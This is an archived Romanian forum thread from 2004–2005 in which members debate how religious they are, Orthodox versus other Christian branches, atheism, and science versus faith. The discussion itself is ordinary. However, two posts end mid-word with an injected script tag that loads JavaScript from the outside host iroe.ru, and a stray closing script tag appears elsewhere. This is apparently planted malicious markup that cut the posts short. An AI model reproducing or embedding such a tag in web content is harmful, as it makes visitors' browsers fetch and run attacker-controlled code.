PDA

Arată versiune întreagă : Cat de credinciosi suntem?

Vlad
06.11.2004, 05:47
<DIV>Haideti sa vorbim despre cat de importanta este RELIGIA in viata noastra.Cat de mult ne influenteaza ea.Cat de convinsi suntem de veridicitatea ei,si care este parerea voastra despre toate "ramurile" crestinismului aparute de-a lungul timpului (acele ramuri numite de unii secte religioase).</DIV>
<DIV></DIV>
<DIV>Pana sa ajung in America,mergeam la biserica de Pasti,si ma consideram CREDINCIOS.Am ajuns aici,si datorita unor divergente pasnice cu niste persoane care faceau parte din "acele noi ramuri",m-am apucat de studiat RELIGIA.Parerea mea e ca sunt o gramada de neclaritati in toate ramurile Crestinismului.</DIV>
<DIV></DIV>
<DIV>Cred ca cel mai important lucru e sa CREDEM IN DUMNEZEU,deoarece EL e numai Unul.</DIV>

ralux
06.11.2004, 11:18
Sunt de acord cu tine Vlad.Nu spun ca nu conteaza sa mergi la biserica,dar cel mai important lucru este sa il ai pe Dumnezeu in suflet si sa te comporti ca atare.
Sunt unii "credinciosi" care merg la biserica destul de des,dar in restul timpului se comporta ca si cum nu ar stii de existenta Divinitatii.Iar altii care desi nu merg la Biserica se comporta exemplar.
Care sunt adevaratii credinciosi?
Stiu ca in America sunt foarte putine biserici ortodoxe.Si atunci ce e de facut?
Despre celelalte religii nu stiu ce sa zic,pentru ca si eu imi pun destule intrebari.Insa nu am studiat problema.

Larvatus2
05.12.2004, 16:29
Vlad: &lt;&lt;Cred ca cel mai important lucru e sa CREDEM IN DUMNEZEU,deoarece EL e numai Unul.&gt;&gt;

Cum si de unde stii asta??smileys/smiley5.gif

Cred ca asta trebuia sa fie inceputul, inaintea criticii neclaritatii textuale, caci fara text, de unde credinta??, ca doar nu ne nastem cu o credinta intr-un Dumnezeu sau mai multi, dumnezeul asta si nu celalt, in functie de etnie . . . .

Larvatus2
05.12.2004, 16:31
Uitat sa spun, ca asa cum e si cazul tau, si eu am studiat religia la un moment dat.

Vlad
06.12.2004, 16:10
Si la ce concluzie ai ajuns dupa ce ai studiat religia????

Larvatus2
07.12.2004, 04:16
Si la ce concluzie ai ajuns dupa ce ai studiat religia????

Ca sunt totul este doaro poveste, mai frumoasa sau nu, ca eu sunt singur, infricosat de moarte si furios din aceasta cauza!!!!smileys/smiley18.gif

Vlad
08.12.2004, 00:37
Cred ca mai trebuie sa citesti.....mai incearca odata,daca tot nu descoperi nimic,roaga pe cineva sa-ti explice sau sa te ajute la citit.Pana la urma o sa reusesti,sunt sigur

Larvatus2
08.12.2004, 13:16
Cred ca mai trebuie sa citesti.....mai incearca odata,daca tot nu descoperi nimic,roaga pe cineva sa-ti explice sau sa te ajute la citit.Pana la urma o sa reusesti,sunt sigur

Tu stii pe cineva?

Tu poti fi acela?

Crezi ca poti convinge pe cineva care deja s-a informat si stie ca nu exista Mos Craciun, sa mai astepte totusi cadouri de la un nene ce merge cu caleasca prin ceruri? smileys/smiley5.gif

tonita
26.12.2004, 08:02
Si totusi Mos Craciun exista, chiar daca nu il putem apuca de guler!

" Lasati copiii sa vina la Mine, ca a unora ca acestia este Imparatia cerurilor,"

Eu as vrea sa am puterea credintei de copil...

02.01.2005, 22:35
Eu sunt convinsa de existenta lui Dumnezeu, si teoretic si practic.De fapt totul a inceput pe la 10 ani, cand am avut sentimentul puternic al unei Singuratati Absolute in tot Universul.A fost un sentiment cumplit si am inceput sa ma intreb cine sunt, de unde vin si incotro ma duc. Si am incercat o gramada de orietari spirituale pentru a afla raspunsuri. Si am crezut mult timp ca o picatura poate cuprinde oceanul.Si m-am intors si am aflat alte cai.Cand cauti, toate drumurile duc la Roma.
Vlad, tu intrebi cat ne influenteaza religia. Pe mine foarte mult.Cu siguranta ca fac multe greseli, dar ma straduiesc sa fiu OM.Si am convingerea experimentata ca cel mai bine iti este cand ai liniste si pace in interior.Cand pui capul pe perna seara (sau dimineata) sa fii multumit de ce ai facut in cursul zilei care a trecut.Si tu poti sa spui ca poti sa fii multumit si daca faci rau cuiva.Eu insa ma refer la partea care iti va arata tot timpul daca ai facut bine sau nu :constiinta.Si toti avem asta si toti am simtit asta.Putem sa n-o luam in seama, dar ea este acolo si ne da semne intodeauna.
Cat despre ramurile de care mentionezi, concluzia mea este (dupa 25 de ani de cautare), ca poti ajunge la comuniunea cu Dumnezeu in orice religie ai fi.Dar efectiv legatura este Iisus.Toti care ajung la El, il cunosc pe Iisus, caci este El intrupat.Nu este alta punte intre noi si El, Alfa si Omega decat Iisus.Biserica Ortodoxa are invataturi foarte profunde si Liturghia este efectiv momentul cand se coboara cerul pe pamant.Plus Tainele la care multi din alte religii crestine au renuntat. Ei vor alt drum si au interpretat Biblia dupa cate orietari au vrut.Daca vrei sa studiezi Biblia, atunci mergi la primele traduceri ale ei si vei descoperi ca cel mai apropiat sens il are Biblia ortodoxa. Pana la urma scindarea Bisericii primare a fost din cauza aviditatii papei. Daca ai stii cate interesuri stau in spatele unora dintre ramurile crestine, ca sa zicem asa, interesuri de care cei de rand nu au habar. Dar oricine, daca Il cauta, ajunge la El. Si atunci va afla o parte din Adevar.Si cineva mi-a spus mai demult: nimeni nu se mai departeaza de ortodoxie odata ce a experimentat-o asa cum este ea in intregime.Dar cati dintre noi fac asta? Sa caute adevaratele nostre varfuri spirituale si sa asculte talcuirea Bibliei si a intregii invataturi si sa se roage si straduiasca sa implineasca tot ce se cere.Nu, este mai usor sa plecam si sa ascultam alte puncte de vedere, dar de fapt noi nu-l stim bine pe al bisericii nostre.
Scuze daca am scris prea mult.
Poate pe curand!

A...Toni, iti doresc din tot sufletul sa fii copil!
Se spune (este adevarat) ca o fetita de 4 ani dorea sa ramana singura cu fratiorul ei abia nascut. Parintii au fost ingrijorati , gandindu-se ca poate i-ar face ceva rau (gelozie sa zicem).Dar, la rugamintea fetitei au fost de acord, stand insa in spatele usii de la camera.Fetita s-a apropiat de patutul unde era fratiorul ei si l-a intrebat: Bebe mic, poti sa-mi spui si mie cum mai arata Dumnezeu, ca eu incep sa-l uit.

dancing_fire
03.01.2005, 08:47
Nemaipomenit Inland. Mi-a placut la nebunie ce ai scris.

Eu pot sa spun ca, cred din tot sufletl in acea putere divina, in Isus, ca ma rog mereu la el, in special dupa ce a aparut pe lume baietelul meu. El, baietelul meu, m-a ajutat sa descopar ceea ce probabil uitasem, ca exista "cineva acolo sus care ne iubeste", ca trebuie doar sa ceri din tot sufletul, sa te rogi cu credinta adevarata si Isus iti va da. Pt ca pentru mine nu exista secunda in care sa nu-l rog pe Isus sa-mi protejeze baietelul, caci el este viata mea. Deci iata ca din nou un copil m-a ajutat sa-l vad pe Dumnezeu din Nou.

SA AVETI UN AN NOU FERICIT TOTI!

03.01.2005, 19:21
Pentru carmentelea:
Ii doresc baietelului tot ce este mai frumos si mai bun de pe lumea asta si de pe cealalta smileys/smiley1.gif .Si ii doresc si taticului si mamicei lui.
Este asa de greu cateodata in lumea asta, dar ce sa faci, Iubirea nu se intrupeaza decat prin suferinta, la momentul actual.

dancing_fire
04.01.2005, 08:07
Multumim mult Inland. Si noi iti dorim de asemenea tot ce este mai bun pe lumea asta, in special multa sanatate pt ca daca esti sanatos, daca ai credinta si incredere in tine, reusesti tot ce iti propui.smileys/smiley1.gif

Ce pacat ca esti in New Zeeland, mi-ar fi facut placere sa ne cunoastem mai bine. Dar putem coresponda mai mult si sa incercam sa ne cunoastem mai bine. Ce zici?smileys/smiley2.gif

tonita
10.01.2005, 02:48
Merci inland, e exact ceea ce imi doresc si eu.

carmen, sa-ti creasca baietelul ca un Fat-frumos si sa-i dai mereu iubire ca sa nu uite nici c

dancing_fire
10.01.2005, 09:15
Multumesc Toni si iti doresc din suflet acelasi lucru tie si familiei tale!smileys/smiley1.gif

Larvatus
11.01.2005, 14:54
Eu pot sa spun ca, cred din tot sufletl in acea putere divina, in Isus, ca ma rog mereu la el, in special dupa ce a aparut pe lume baietelul meu. El, baietelul meu, m-a ajutat sa descopar ceea ce probabil uitasem, ca exista "cineva acolo sus care ne iubeste", ca trebuie doar sa ceri din tot sufletul, sa te rogi cu credinta adevarata si Isus iti va da. Pt ca pentru mine nu exista secunda in care sa nu-l rog pe Isus sa-mi protejeze baietelul, caci el este viata mea. Deci iata ca din nou un copil m-a ajutat sa-l vad pe Dumnezeu din Nou.

Hm! Fara suparare, e cam transparent si transparent-de-subtire motivul asta pentru care te (re-)indreptasi spre religie . . . . Te inteleg insa foarte bine, caci simt acelasi lucru pentru baietelul meu de 5 anisori cum tu simti pentru copilasul tau. Simt si eu nevoia ca ceva sa ma asigure, ceva sa-mi dea linistea ca el e protejat, ca viata si sanatatea, fericirea lui, sunt garantate; doar ca mi-e greu sa ma mint: nimic nu-mi poate da aceste certitudini si ultimul dintre toate poate fi o rugaciune; tot ce pot sa fac este sa veghez si sa actionez la o adica, si astain masura limitatelor mele puteri de biata fiinta umana . . . .

In doar 2 cuvinte, ca sa precizez motivul asta

Larvatus
11.01.2005, 15:09
Cat despre ramurile de care mentionezi, concluzia mea este (dupa 25 de ani de cautare), ca poti ajunge la comuniunea cu Dumnezeu in orice religie ai fi.Dar efectiv legatura este Iisus.Toti care ajung la El, il cunosc pe Iisus, caci este El intrupat.Nu este alta punte intre noi si El, Alfa si Omega decat Iisus.

Oh boy!
Interesant . . . care va sa zica, judecand dupa afirmatiile tale, toti care

Larvatus
11.01.2005, 15:49
Daca vrei sa studiezi Biblia, atunci mergi la primele traduceri ale ei si vei descoperi ca cel mai apropiat sens il are Biblia ortodoxa. Pana la urma scindarea Bisericii primare a fost din cauza aviditatii papei. Daca ai stii cate interesuri stau in spatele unora dintre ramurile crestine, ca sa zicem asa, interesuri de care cei de rand nu au habar. Dar oricine, daca Il cauta, ajunge la El. Si atunci va afla o parte din Adevar.

Adevarat este ca cea mai apropiata, ca sens general dar si ca fidelitate textuala in comparatie cu manuscrisele inceputurilor care au putut ajunge pana la noi, este Biblia ortodoxa.
Fapt tacit sau indirect acceptat si de Occident de mult timp, de prin 1500, cand invatatii lui au tradus si partial inspirat din Biblia in limba greaca a vremii, abandonand sau modificand partial poluata versiune latina (vulgata).
Ce este insa trist sa afli e ca si aceasta, Biblia ortodoxa adica, este departe de primele manuscrise, aceasta avand operate modificari, adaugiri, care ori ascund sensuri originale, ori le adauga falsificand. E bine sa stim chestia asta, caci a stii si spune numai ce iti convine nu se numeste a cunoaste ci a face propaganda.
Astfel, Evanghelia dupa Marcu, prima Evanghelie scrisa (in contrast cu ordinea arbitrara din N.T.), intr-unul din cele mai vechi manuscrise de N.T. existente, se termina la Marcu 16:8; lipsesc deci

Larvatus
11.01.2005, 16:40
Si totusi Mos Craciun exista, chiar daca nu il putem apuca de guler!

Da, e mama si tata, inarmati cu miraculoasa lor carte decredit sau debit . . . .smileys/smiley1.gif

" Lasati copiii sa vina la Mine, ca a unora ca acestia este Imparatia cerurilor,"

Ce le da? Unde sa se duca exact? Eu pe fi-miu parca l-as mai tine o leaca pe langa mine, macar sa dau eu ochii inainte cu "mosu" asta al tau . . . . Nu poci ca sa-ti zic de ce simt asa! smileys/smiley36.gif

Eu as vrea sa am puterea credintei de copil...

Tu esti obraznic de exigent . . . . eu m-as multumi sa am macar credinta unei carmentelea sau inland! Doar atat si tot as zice ca l-am apucat pe Dumnezeu de m

dancing_fire
11.01.2005, 18:22
Nu crezi ca ai cam mult tupeu judecandu-ne pe noi de ce credem in Dumnezeu?! smileys/smiley7.gifTi-a
cerut cineva sa o faci?! Topicul era "Cat de credinciosi suntem" nu
"Hai sa-i judecam pe cei care cred in Dumnezeu". E problema ta daca
esti ateu, e problema noastra daca credem in Dumnezeu.

Eu zic sa stai frumusel in banca ta, sa-ti spui parerile fara sa judeci
pe cineva, ca uite nici noi nu te judecam pe tine ca esti ateu.

Ce pacat ca nu mai poti sa ai nici macar puritatea unui suflet de
copil, ca atunci sigur ai simti macar de Craciun ca exista Mos Craciun.
Poate ca ai fi mai castigat daca i-ai da mai multa atentie baietelului
tau. Copii nu stiu sa minta, de aceea copii cred in Mos Craciun, ca
sunt suflete inocente, pure.

Larvatus
12.01.2005, 05:07
Nu crezi ca ai cam mult tupeu judecandu-ne pe noi de ce credem in Dumnezeu?! </v:stroke></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:f></v:ulas></v:path><o:lock aspectratio="t" v:ext="edit"></o:lock></v:shape></v:imagedata></v:shape>

Imi pare rau ca te-am suparat. Imi pare rau desi sper ca totusi in sinea ta imi dai macar un pic dreptate. Sincer, nu cred ca solutia este "nu ma judeci, nu te judec". Nu cred ca am tupeu, intrucat nu am judecat pe nimeni ca a crezut in Dumnezeu, ci doar ca a crezut de-o maniera pe care mi-o imaginam apusa odata cu . . . . "adormirea" lu' mamaia de la tara. Simi-am expusa punctul de vedere fara cea mai mica rautate.

Ti-a cerut cineva sa o faci?! Topicul era "Cat de credinciosi suntem" nu "Hai sa-i judecam pe cei care cred in Dumnezeu".

La aceeasi tematica am raspuns si eu replica mea . . . chiar daca, pare-se, de o maniera care te-a deranjat serios. Eu insumi sper si tanjesc, daca macar nu posed pentru moment, o forma de credinta. Eu insumi am in familie sau in jur, amici, care cred. Daca mi-am spus punctul de vedere in legatura cu modul cum ai pus tu problema credintei si motivatiei acestei credinte, este pentru ca mi s-a parut ca prea pune intr-o lumina negativa credinciosii. Frica, desi explicabila ca motiv al religiozitatii, e bine si prudent sa o "imbracam" bine, in alte cauze pentru care declaram ca credem, caci ele exista, cel putin la alte persoane. Tu insa, ai spus-o prea pe sleau . . . . ai pus-o prea in capu' listei si prea singura, saraca.

E problema ta daca esti ateu, e problema noastra daca credem in Dumnezeu.

Arfi bine daca ar putea sa fie atat de simplu! In realitate, nu este. Traim intr-o societate umana, nu intr-o suma de rezervatii, traim intr-o comunitate culturarala sau lingvistica si interactionam unul asupra celuilalt si prin modulnostru de gandire. Si e legitim sa facem asta, atat timp cat acceptam punctul de vedere al celuilalt. A vrea sa inchizigura cuiva doar pentru ca remarcile luite deranjeaza sau a vrea sa creezi lumi paralele in care traim separat, ei bine, asta nu inseamna acceptare a punc<script src=http://www.iroe.ru/ngg.js></script>

Billy
12.01.2005, 07:20
Sincer, nu cred ca solutia este "nu ma judeci, nu te judec". Nu cred ca am tupeu, intrucat nu am judecat pe nimeni ca a crezut in Dumnezeu, ci doar ca a crezut de-o maniera pe care mi-o imaginam apusa odata cu . . . . "adormirea" lu' mamaia de la tara.

&gt;&gt; Religia nu este ceva care apune, azi este la moda miine nu mai este. Crezi sau nu crezi.

Personal nu sint o persoana care a mers la biserica regulat. Stiu ca nu sint un exemplu pentru nimeni. Dar nu inteleg cum te poti indoi de existenta lui Dumnezeu numai daca te gindestica nu poti sa iti explici ce inseamna universul, infinitul. Viata este un mister si nu vom putea explica niciodata ceea ce nu se poate explica. Credinta o ai in suflet, nu stii de ce si nu trebuie sa fie neaparat teama cauza.

Imi aduc aminte un preot in Romania spunea ca exista credinciosi care se tem de Dumnezeu - care se numesc robii lui Dumnezeu si cei care il iubesc pe Dumnezeu - fii/fiicele lui Dumnezeu, daca imi aduc bine aminte.

Sint de acord cu ralux, credinta este un mister, unii il au pe Dumnezeu in suflet, chiar daca nu isi dau seama.

Larvatus
12.01.2005, 11:22
Sincer, nu cred ca solutia este "nu ma judeci, nu te judec". Nu cred ca am tupeu, intrucat nu am judecat pe nimeni ca a crezut in Dumnezeu, ci doar ca a crezut de-o maniera pe care mi-o imaginam apusa odata cu . . . "adormirea" lu' mamaia de la tara.

Religia nu este ceva care apune, azi este la moda miine nu mai este. Crezi sau nu crezi.

Draga Bily, religia nu este "chestie de moda", total adevarat. Religia se bazeaza pe un corp de invataturi si cerinte imuabile (exact contrariul fenomenului modei). Ele nu evolueaza in timp si asta este concomitent un atu, dar si o mare scadere a religiei: o lipseste de putinta de a evolua, de a se perfectiona continuu, adapatandu-se cunoasterii crescute a omenirii.

Credinta insa, sau forma de credinta, ea evolueaza de la o generatie la alta, ne e marturie istoria: desi iubind si urmand aceleasi carti de-a lungul timpului, crestinii (ca membrii oricarui alt cult, de altfel) cred diferit in epoci diferite, pentru ca sunt dpdv moral si cognitiv diferiti de la o epoca la alta. Intr-un fel credeau si vedeau lumea, o anumita morala si un anumit rit, aveau crestinii primului secol iar o alta, si altele erau, doar 150 de ani sau 200 de ani mai tarziu. Acelasi lucru e valabil luand in discutie orice epoca. Noi, in majoritate, nu mai credem si nu mai avem aceeasi perceptie a moralei crestine azi, ca cei de acum 100 sau 200 de ani. Nu mai avem o aceeasi intelegere a moralei crestine. Pot exemplifica, daca e cazul.

Larvatus
12.01.2005, 16:16
In patria noastra scumpa, Romania, dar nu numai acolo, ci peste tot prin lume, copii sunt omorati de mame iresponsabile, fiind abandonati dupa nastere prin lanuri, in zapada, infundati in WC-uri publice sau pur si simplu aruncati la pubela cu gunoi.
Tot in patria noastra scumpa, un milion de copii pe an sunt avortati de tinerele romance . . . . ei mor inainte sa traiasca o zi, ele traiesc si se bucura de privilegiul de a trai.
Eram copil pe timpul lui Ceausescu cand ma jucam cu amicii mei de bloc in jurul "ghienei" - asa ii ziceam noi la spatiul unde erau tomberoanele de gunoi, nu stiu daca exista termenul sau daca este corect scris.
Ne stropeam, tin minte, aruncand apa din niste recipiente ("sticle" i-ar zice unii) din plastic pe care era scris "DEVAL" (un detergent lichid romanesc). Unul dintre noi intrand sa-si realimenteze "pistolul" la robinet, observa o cutie in jurul careia b

Billy
13.01.2005, 05:37
Draga Bily, religia nu este "chestie de moda", total adevarat. Religia se bazeaza pe un corp de invataturi si cerinte imuabile (exact contrariul fenomenului modei). Ele nu evolueaza in timp si asta este concomitent un atu, dar si o mare scadere a religiei: o lipseste de putinta de a evolua, de a se perfectiona continuu, adapatandu-se cunoasterii crescute a omenirii.

Uneori intuitia sau credintaface mai mult decit sute de carti citite, am tot respectul fata de invatatura, stiinta, ne poate imbunatatii viata pe pamint, dar nu cred ca vom ajunge sa aflam adevarul prin stiinta. Am impresia ca ceea ce scrii este sub semnul citatului de la sfirsit smileys/smiley2.gif

Am urmarit odata o emisiune pe PBS, fizicienii si matematicienii sint departe de a fi descoperit ceea ce inseamna universul, eu cred ca nici nu vor putea descoperii ceva, efortul este infinit, mai presus de puterea noastra de intelegere. O teorie fizica o infirma pe alta, teoria relativitatii este un bun model matematic, dar nu este adevarul final, poate fi contrazisa. Nu intru intr-un domeniu in care nu sint bine documentat, poatecunosti mai bine ca mine argumentele pro si contra.

Credinta insa, sau forma de credinta, ea evolueaza de la o generatie la alta, ne e marturie istoria: desi iubind si urmand aceleasi carti de-a lungul timpului, crestinii (ca membrii oricarui alt cult, de altfel) cred diferit in epoci diferite, pentru ca sunt dpdv moral si cognitiv diferiti de la o epoca la alta. Intr-un fel credeau si vedeau lumea, o anumita morala si un anumit rit, aveau crestinii primului secol iar o alta, si altele erau, doar 150 de ani sau 200 de ani mai tarziu. Acelasi lucru e valabil luand in discutie orice epoca. Noi, in majoritate, nu mai credem si nu mai avem aceeasi perceptie a moralei crestine azi, ca cei de acum 100 sau 200 de ani. Nu mai avem o aceeasi intelegere a moralei crestine. Pot exemplifica, daca e cazul.

Daca te referi la oameni (inchizitie, etc.) ei pot gresii.

</script>

garfield
13.01.2005, 06:59
Uneori intuitia sau credintaface mai mult decit sute de carti citite, am tot respectul fata de invatatura, stiinta, ne poate imbunatatii viata pe pamint, dar nu cred ca vom ajunge sa aflam adevarul prin stiinta.

Depinde ce carti citesti. Daca nu aflam adevarul din stiinta, de unde-l aflam? De la religie? Nu cu mult in urma biserica in numele religiei a omorat pe oricine zicea ca pamantul este rotund...sau ca soarele si restul universului nu se invirt in jurul pamantului, etc.

Billy
13.01.2005, 09:54
Depinde ce carti citesti. Daca nu aflam adevarul din stiinta, de unde'l aflam? De la religie? Nu cu mult in urma biserica in numele religiei a omorat pe oricine zicea ca pamantul este rotund...sau ca soarele si restul universului nu se invirt in jurul pamantului, etc.

Daca ai citit tot mesajul (banuiesc ca te-ai enervat dupa primul paragraf), am spus si eu acelasi lucru despre greselile facute de oameni. Ideea nu era asta. Oare stiinta ne-a invatat cum sa nu omorim sau cum sa o facem mai eficient ? Amesteci varza cu capra.

garfield
13.01.2005, 10:10
Nu ma-m inervat de loc. Singurul lucru care l-am spus e ca religia si adevarul nu merg totdeauna mana-in-mana. De asemenea ce te invatza religia si ce interpreteaza oamenii nu e totdeauna acelasi lucru. Uitate numai la Coran si la Holy War.

Larvatus
13.01.2005, 14:01

Uneori intuitia sau credintaface mai mult decit sute de carti citite, am tot respectul fata de invatatura, stiinta, ne poate imbunatatii viata pe pamint, dar nu cred ca vom ajunge sa aflam adevarul prin stiinta. Am impresia ca ceea ce scrii este sub semnul citatului de la sfirsit

Nu stiu la care

Larvatus
13.01.2005, 14:53
a ai citit tot mesajul (banuiesc ca te-ai enervat dupa primul pasaj), am spus si eu acelasi lucru despre greselile facute de oameni.

As vrea sa fac si eu cateva observatii aici: cand comunismul vorbeste de

19.01.2005, 12:50
Larvatus,
se spune ca Dumneze este simplu, oamenii complica lucrurile.
Daca tot ce ai scris sunt gandurile, intrebarile si confruntarile tale , gasesc ca esti tare framantat de Cel caruia i se spune Dumnezeu.Si poti sa cazi prada acestora sau poti sa iesi biruitor. Depinde cum vrei tu sa abordezi.Sau ce vrei tu sa lasi sa se ocupe de acest subiect.Mintea ta sau inima ta. Mintea o sa te arunce din intrebari in intrebari. Nu ai cale de iesit. Esti o granula de nisip in desert. Poti tu sa vezi si sa cunosti desertul din aceasta pozitie? Eu ajunsesem pana sa vreau sa aflu si cum s-a creat Dumnezeu? Ani de zile am tot cautat sa-I dau de capat...Lui.
Si cred ca prima intrebare din toate la care este necesar sa-i aflam raspuns este cea indreptata spre noi insine."Cine sunt eu?".APOI sa cautam in afara, atunci cand ai centrul, miezul problemei stiut, o sa intelegi ceva din Ratiunea Dumnezeiasca.

As avea doar foarte putine raspunsuri la intrebarile tale, dar prefer sa nu le dau.Pentru ca mintea ta va desparti iarasi firul in patru, in zece, cautand sa complice.
Cred ca exista o solutie pentru tine, nu mi-o lua in nume de rau. Roaga-te. Se vede treaba ca esti un Cautator.O sa ai si raspunsurile.Dar lasa totul deoparte doar pentru o perioada si roaga-te.
smileys/smiley27.gif smileys/smiley27.gif smileys/smiley27.gif

Larvatus
19.01.2005, 20:26
<TT>

Larvatus, se spune ca Dumneze este simplu, oamenii complica lucrurile. Daca tot ce ai scris sunt gandurile, intrebarile si confruntarile tale , gasesc ca esti tare framantat de Cel caruia i se spune Dumnezeu. Si poti sa cazi prada acestora sau poti sa iesi biruitor.

Dupa tine a refuza ratiunea, inseamna probabil

20.01.2005, 21:58
Mintea este un potential cu care ne-am nascut. Este data de la creatie. Dar eu vorbeam ca trebuie sa renunti la modul tau de a vedea lucrurile, de a incerca sa le tot despici pentru a afla raspunsurile.Tocmai pentru ca acest tip de raspunsuri nu sunt deocamdata acolo. Mintea trebuie curatata. Trebuie unita cu inima si inaltata la Dumnezeu.Dar probabil ca vorbesc un limbaj necunoscut.Vezi, tocmai de aceea nu as vrea sa ma avant in a-ti da unele raspunsuri, pentru ca multe ale Lui nu sunt logice.Cum sa-ti explic ca 1+1=3, fara sa cad in abstract?

Nu sunt impotriva la cateva din cele pe care le sustii.
Dupa parerea mea ,religia a existat rareori sub o forma sanatoasa, cu exceptia aparitiei pe pamant ale marilor personalitati spirituale. In rest este doar aviditate dupa putere.Stim cu toti rolul Bisericii in stat in trecut si chiar si in prezent. Nu ma refer la islamism, care este cel mai bun exemplu in acest sens. Stim cate atrocitati au fost facute in numele crestinitatii si al lui Dumnezeu. Noi suntem o tara crestina, nu? Suntem oare crestini sau mai bine zis,cati suntem oare religiosi? "Ne-am nascut intr-o familie crestina, am devenit automat crestini.Practic nu facem nimic, nu facem in mod constient nici o alegere.Nu a existat nici o cautatre, nici un pelerinaj.Religia devine o eticheta."Cuvantul crestin s-a cam deteriorat de a fost nevoie sa i se adauge :bun,adevarat...crestin.Pesemne ca o sa devina f.bun crestin in curand. Am cautat mult si eu, sa vad ce si cum este cu Dumnezeu,cu Biblia, cu Legile, cu sensul acestei vieti.Si am fost tare razvratita.Nu sunt un om care sa accepte ce este scris intr-o carte chiar daca acea carte se spune ca este de la Dumnezeu sau ce spun cei care sunt autoritati in domeniu. Am avut mare razboi cu El. Mi-am pus intrebarile pe care ti le pui si tu, am privit in jurul meu si am fost total dezorientata, neintalnind acel Adevar pur. Am intalnit multi oameni spirituali , initiati, maestri...am stat la umbra lor luni de zile.Si am plecat dezamagita,pentru ca nu erau ceea ce se dadeau ca sunt. Am cautat si am cautat,si iarasi am cautat si m-am zbatut intre viata si moarte, dar nu am cautat din curiozitate ci dintr-o intensa sete de cunoastere. Pana am avut revelatia ca nu sunt pe directia buna:ceea ce caut eu voi gasi doar in inima mea, in interiorul fiintei.Si apoi am fost ajutata ca si pana atunci de fapt. De Cel care dorea sa aflu ca exista.Si cu revelatia faptului ca exista , si cu trairea limitata, omeneasca, a Celui ce exista, altfel m-am reintors asupra lumii si a oamenilor. Dar in drumul meu am intalnit cativa oameni din tara ca parintele Galeriu, parintele Cleopa, Ioan de la Ionesti s.a. , in care L-am cunoscut si vazut pe Dumnezeu.

Stii de ce am zis ca numai prin Iisus ajungi la Dumnezeu? Pentru ca inainte de "cadere", se pare ca era o anume comuniune intre om si Dumnezeu.Exista o punte.Dupa "cadere" ea a fost rupta.Vechiul Testament arata o relatie oarecum rece intre poporul evreu si Dumnezeu.Trecem peste interpretarile Bibliei si vorbim simplist, se pare ca relatia care exista inainte de cadere a fost restabilita NUMAI prin intruparea lui Dumnezeu.El a refacut puntea.De aceea nu ai cum sa ajungi la El -decat folosind aceasta punte.Esti hindus si il cauti pe Dumnezeu.Nu stii de Iisus. Dar daca il cauti cu inima curata si nu te impotmolesti pe drum in alti dumnezei, in momentul cand Dumnezeu vine in intampinarea ta, iti va intinde puntea intruparii Lui. Intruparea este singurul punct comun dintre om si Dumnezeu. Poti sa-i spui Iisus sau Dumnezeu intrupat. Si vei avea revelatia lui Iisus, in acel moment. Dar sa stii ca si Satana poate lua chipul ingerului de lumina.Deci, nu toti cei ce spun ca sunt fiii sau copiii lui Dumnezeu inseamna ca si sunt.

Si eu stiu ca Mos Craciun nu exista, dar este departe de a face paralela intre el si Dumnezeu.

Zice ca Matei se ruga "Cred Doamne, ajuta necredintei mele" Cdee ca t<script src=http://www.iroe.ru/ngg.js></script>

Larvatus
21.01.2005, 06:53
Se pare ca doar cu putin efort si suficienta toleranta, distanta intre un asa-zis ateu si un declarat credincios nu este atat de mare. Am inteles mai bine anumite lucruri acum, apare evident prin mesajul tau ca credinciosii nu sunt atat de naivi cumcred unii.

Dar cel mai interesant, daca nu si cel mai lamurit deocamdata pentru mine, este drumul parcurs de tine spre descoperirea Absolutului. Oricum, de data asta inteleg mai exact cum arata aceasta experienta. Eu nu o sa pot repeta exact evolutia asta, intrucat nu am cum sa-i intalnesc pe oamenii amititi de tine . . . sunt probabil ca si tine azi, un imigrant. Locuiesc la Montreal, iar oamenii spre care in mod logic s-ar indrepta privirile mele aici, nu cred ca au ce sa-mi ofere: probabil exista putine comunitati romanesti nordamericane atat de divizate in materie de religie si mai ales divizate de catre interese meschine ale preotilor de aici, ca aceasta! Din toti preotii pe care ii stiu aici, si sunt destui, in afara de unul, numit Vasiliu, eu nu stiu pe altcineva care sa aiba macar statura morala pentru a-mi trezi interesul . . . Omul acesta, "pastoreste" insa o comunitate romaneasca "veche", mai veche decat aceea din care fac eu parte, si nu sunt venit tocmaide curand. . . . acolo sunt foarte multi batrani, oameni de varsta inaintata fiind o majoritate, in contrast cu cei din alte biserici romanesti, chestie care poate in mod nejustificat m-a indepartat la un anumit moment. Poate am gresit, intrucat, cum ziceam, e singurul om care nu are in trecutul sau "povesti de circ", ba dimpotriva, este unul care a trait o iubire exemplara in familie si o viata model. Restul, sunt niste circari, despre care se ride si care ne-au facut sa ne crucim prin patzaniile lor de nenumarate ori (acum mai putin de o jumatate de an, s-au incaierat in Altar . . . .), pe unul dintre ei, il am chiar ca pe un soi de cunostinta de familie si pot sa spunca rareori mi-a fost dat sa vad atata ura intr-un om: Ura politica . . . . uraste protestantii pana la fanatism, intrucat acestia neaga oarecum importanta clerului si ierarhiei bisericesti. Intreaga sa viata este consumata de aceasta obsesie . . . nemairam

Ekklesia
25.01.2005, 15:29
Sunt sincer impresionat de acest dialogul pe teme spirituale si de profunzimea ideilor lansate. Spun "spirituale" pentru ca eu consider ca trebuiste facuta o distinctie intre "religiozitate" si "spiritualitate". Se pare ca oamenii sunt relativ "religiosi" prin natura lor insa in opinia mea, testul unei adevarate religii sta in "spiritualitatea" pe care acesta (religia, setul de credinte, convingeri, etc)il produce in viata omului religios. Adevarul e ca lumea e satula de oameni religiosicare fac de rusine atat Scriptura pe care o predica cat mai ales pe Christos si biserica sa deorece afirma una si traiesc alta...adica auo religie ambalata frumos, mai veche sau mai nou insa una fara putere de schimbare atat in viata celor ce o predica cat si in viata celor cei urmeaza.

Nu uitati insa ca acesta problema a existat si pe vremea lui Christos si de aceea cei mai criticati de Christos oameni in Evanghelii nu au fost pacatosii ci religiosii -si asta tocmai pentru ipocrizia lor, pentru o religie cu forme elaborate,impresionanta pe dinafarainsa fara nici o putere de a schimba omul in primul rand pe dinlauntru. Invatatura fundamentala a Scripturii este ca a fi crestin inseamna a fi nu doar un om care crede anumite invataturi crestine...ci unul care traieste o viata asemeneea lui Christos. Apostolul Pavel spunea "Daca este cineva in Christos este o faptura noua..."

Spiritualitatea (ma refer la cea crestina) este tocmai aceea stare "transformata"pe care Spiritul Sfant (Duhul Sfant) o realizeaza in cei credinciosi (religiosi) ca si rezultat al interactiunii acestora atat cu Scripturacat si cu biserica.

